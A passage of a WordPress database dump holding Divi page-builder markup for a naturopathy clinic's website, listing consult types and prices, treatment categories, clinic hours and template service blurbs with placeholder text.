_builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" hover_enabled=\"0\" border_width_all=\"1px\" sticky_enabled=\"0\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" title_text=\"3-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Return consult (50 min) - $80\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat; font-\">This time is used to review your progress and make the necessary changes to your treatment plan and/or health goals. We will discuss any new concerns you may have and formulate a timeline with which to base your treatment on. </span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.9.4\" background_enable_color=\"off\" custom_padding=\"0px|0px|0px|0px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" title_text=\"2-01\" align=\"center\" _builder_version=\"4.9.4\" _module_preset=\"default\" background_color=\"#ccd4c8\" custom_margin=\"||20px||false|false\" custom_padding=\"30px||30px||false|false\"][/et_pb_image][et_pb_blurb title=\"Express consult (20 min) - $40\" use_icon=\"on\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" module_alignment=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\" sticky_enabled=\"0\" custom_padding=\"10px|10px|10px|10px|false|false\"]<p><span style=\"font-family: Montserrat;\">A shorter consult devoted to acute conditions such as colds/flus, infections/illness, recent sleep upset, seasonal allergies or emotional health issues. Not suitable for long-term or chronic health issues.</span><span style=\"font-family: Montserrat;\"></span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"||20px||false|false\" custom_padding=\"||0px|||\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display,Montserrat\"]<h2><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Treatments</span></h2>\n<p><span style=\"font-size: large; font-family: Montserrat;\">As naturopaths, we have the knowledge base and training to prescribe various treatment forms that work synergistically to improve your health and vitality.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" hover_enabled=\"0\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\" sticky_enabled=\"0\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Herbal medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/3-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Liquid herbal blends</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></li>\n<li>Capsules/tablets<span style=\"font-family: Montserrat;\"></span></li>\n<li>Teas</li>\n<li>Topical creams</li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Nutritional medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/4-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Food as medicine</span></li>\n<li><span style=\"font-family: Montserrat;\">Nutritional compounds</span></li>\n<li><span style=\"font-family: Montserrat;\">Supplements</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Lifestyle \" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/5-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat;\">Stress strategies</span></li>\n<li><span style=\"font-family: Montserrat;\">Exercise and movement</span></li>\n<li><span style=\"font-family: Montserrat;\">Mindfulness </span></li>\n<li><span style=\"font-family: Montserrat;\">Sleep support</span></li>\n</ul>\n<p> </p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Energetic medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/2-01.png\" image_last_edited=\"off|phone\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">Flower essences </span></li>\n</ul>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" make_equal=\"on\" _builder_version=\"4.9.4\"][et_pb_column type=\"3_5\" admin_label=\"Column\" _builder_version=\"4.4.8\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"Josefin Sans|600|||||||\" header_2_font_size=\"60px\" header_2_line_height=\"1.2em\" custom_margin=\"||20px||false|false\" header_2_font_size_tablet=\"42px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|phone\" header_2_line_height_tablet=\"\" header_2_line_height_phone=\"1.4em\" header_2_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\';\">Make the shift to a more holistic approach to your health</span></h2>[/et_pb_text][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" inline_fonts=\"Montserrat\"]<p><span style=\"font-family: Montserrat; font-weight: normal;\">Naturopathy views health not merely as the absence of disease but by the presence of vitality, promoting the synergy of mental, emotional and physical health within the body. We are guided by the six naturopathic principles, utilising these to help us form evidence-based treatment plans that encompass the person as a whole:</span><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>\n<ul>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">first, do no harm</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">the healing power of nature</span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">identify and treat the cause </span></li>\n<li><span style=\"font-size: 16px; font-family: Montserrat; font-weight: normal;\">doctor as teacher</span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">treat the person as a whole<span style=\"font-size: 16px;\"></span></span></li>\n<li><span style=\"font-family: Montserrat; font-weight: normal;\">prevention</span></li>\n</ul>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" admin_label=\"Column\" _builder_version=\"4.9.4\" background_color=\"#ccd4c8\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"bottom_right\" custom_padding=\"20px|20px|20px|20px|true|true\"][et_pb_image src=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/1-01-crop.png\" title_text=\"1-01 crop\" align=\"center\" admin_label=\"Image\" _builder_version=\"4.9.4\" width=\"100%\" scroll_vertical_motion_enable=\"on\" scroll_vertical_motion=\"0|50|50|100|1|0|-1\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"4.4.8\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.8\"][et_pb_button button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Footer\" _builder_version=\"4.9.4\" background_color=\"#ffffff\" use_background_color_gradient=\"on\" background_color_gradient_start=\"rgba(255,255,255,0.8)\" background_color_gradient_end=\"#ccd4c8\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" overflow-x=\"hidden\" overflow-y=\"hidden\" locked=\"off\"][et_pb_row _builder_version=\"4.4.7\" width=\"60%\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" header_2_font=\"ZCOOL XiaoWei||||||||\" header_2_text_color=\"#a9804a\" header_2_font_size=\"80px\" text_orientation=\"center\" max_width=\"550px\" max_width_tablet=\"350px\" max_width_phone=\"220px\" max_width_last_edited=\"on|desktop\" module_alignment=\"center\" header_2_font_size_tablet=\"48px\" header_2_font_size_phone=\"30px\" header_2_font_size_last_edited=\"on|phone\" border_width_left=\"5px\" border_color_left=\"#a9804a\" inline_fonts=\"Playfair Display\"]<h2><span style=\"font-family: \'Playfair Display\'; color: #000000;\">Clinic info</span></h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"4.4.7\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat,Playfair Display\"]<h3><span style=\"font-family: \'Playfair Display\';\">Location</span></h3>\n<p><span style=\"font-family: Montserrat;\">Kalamunda (face-to-face)</span><br /><span style=\"font-family: Montserrat;\">Online Zoom consults available</span></p>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.8\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\"]<h3></h3>[/et_pb_text][et_pb_button button_text=\"Make a booking\" button_alignment=\"center\" _builder_version=\"4.9.4\" custom_button=\"on\" button_text_size=\"22px\" button_bg_color=\"#a9804a\" button_border_width=\"0px\" button_border_radius=\"50px\" button_font=\"Josefin Sans|600|||||||\" background_layout=\"dark\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"15px|40px|15px|40px|true|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.4.7\" text_font=\"Muli||||||||\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_3_font=\"Josefin Sans||||||||\" header_3_line_height=\"1.4em\" text_orientation=\"center\" text_font_size_tablet=\"\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"on|phone\" header_3_font_size_tablet=\"20px\" header_3_font_size_phone=\"18px\" header_3_font_size_last_edited=\"on|tablet\" header_3_line_height_tablet=\"\" header_3_line_height_phone=\"1.8em\" header_3_line_height_last_edited=\"on|phone\" locked=\"off\" inline_fonts=\"Montserrat\"]<h3><span style=\"font-family: \'Playfair Display\'; font-weight: normal;\">Clinic Hours</span></h3>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\">Tues/Wed/Thurs: 9am - 5pm</span><br /><span style=\"font-family: Montserrat; font-weight: normal;\">Alternate Saturdays: 9am-1pm</span></p>\n<p><span style=\"font-family: Montserrat; font-weight: normal;\"></span></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','28-revision-v1','','','2021-05-25 20:23:16','2021-05-25 12:23:16','',28,'https://verde.desidrivers.com.au/?p=135',0,'revision','',0),(94,1,'2021-05-01 11:50:17','2021-05-01 03:50:17','[et_pb_section fb_built=\"1\" admin_label=\"Header\" _builder_version=\"4.9.4\" background_color=\"gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(249,243,235,0.8)\" background_color_gradient_overlays_image=\"on\" background_enable_image=\"off\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||180px||false|false\" locked=\"off\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%22background_color%22%93}\"][et_pb_row _builder_version=\"4.4.7\"][et_pb_column type=\"4_4\" _builder_version=\"4.4.7\"][et_pb_text _builder_version=\"4.9.4\" text_font=\"||||||||\" text_font_size=\"22px\" text_line_height=\"1.4em\" header_font=\"ZCOOL XiaoWei||||||||\" header_text_color=\"#000000\" header_font_size=\"80px\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" text_font_size_tablet=\"18px\" text_font_size_phone=\"16px\" text_font_size_last_edited=\"on|tablet\" text_line_height_tablet=\"\" text_line_height_phone=\"1.8em\" text_line_height_last_edited=\"on|phone\" header_font_size_tablet=\"48px\" header_font_size_phone=\"30px\" header_font_size_last_edited=\"on|phone\" global_colors_info=\"{%22gcid-dd65992f-8cd0-49f3-a81c-2cdf23a9bf88%22:%91%93}\"]<h1>My Services</h1>\n<p>Nulla quis lorem ut libero malesuada feugiat curabitur non nulla sit convallis quis ac lectus amet nisl tempus.</p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Services\" _builder_version=\"4.4.7\" background_color=\"rgba(0,0,0,0)\" custom_padding=\"0px|||||\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_margin=\"-120px||||false|false\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Homeopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-10.png\" _builder_version=\"4.9.4\" header_font=\"Playfair Display|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" sticky_enabled=\"0\"]<p>Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.</p>[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_last_edited=\"off|desktop\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Hypnopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-2.png\" _builder_version=\"4.9.4\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" hover_enabled=\"0\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\" sticky_enabled=\"0\"]<p>Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.</p>[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Eastern Medicine\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-3.png\" image_last_edited=\"off|tablet\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" _builder_version=\"4.4.8\" background_color=\"#ffffff\" custom_margin=\"-1px||||false|false\" custom_margin_tablet=\"0px||||false|false\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"0px||0px||true|false\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"1px\" box_shadow_color=\"#000000\"][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Naturopathy\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-7.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" border_width_all=\"1px\"][et_pb_blurb title=\"Relaxation Massage\" image=\"https://verde.desidrivers.com.au/wp-content/uploads/2021/05/holistic-healer-icon-1.png\" _builder_version=\"4.4.8\" header_font=\"Josefin Sans|600|||||||\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Muli||||||||\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation=\"off\" header_font_size_tablet=\"20px\" header_font_size_phone=\"18px\" header_font_size_last_edited=\"on|phone\" header_line_height_tablet=\"\" header_line_height_phone=\"1.8em\" header_line_height_last_edited=\"on|phone\" body_font_size_tablet=\"\" body_font_size_phone=\"14px\" body_font_size_last_edited=\"on|phone\" locked=\"off\"]Nulla quis lorem ut libero malesuada feugiat. Curabitur non nulla sit amet nisl tempus convallis.[/et_pb_blurb][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.7\" custom_button=\"on\" button_text_size=\"22px\" button_text_color=\"#2a2a2a\" button_bg_color=\"rgba(0,0,0,0)\" button_border_width=\"0px\" button_border_radius=\"0px\" button_font=\"Josefin Sans|600|||||||\" button_use_icon=\"off\" custom_margin=\"10px||||false|false\" custom_padding=\"|0px|10px|0px|false|true\" button_text_size_tablet=\"18px\" button_text_size_phone=\"14px\" button_text_size_last_edited=\"on|phone\" box_shadow_style=\"preset4\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"2px\" box_shadow_color=\"#000000\" locked=\"off\"][/et_pb_button][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"4.4.8\" background_enable_color=\"off\" custom_padding=\"60px|20px|60px|20px|true|true\" custom_padding_tablet=\"\" custom_padding_phone=\"30px||30px||true|false\" custom_padding_last_edited=\"on|phone\" 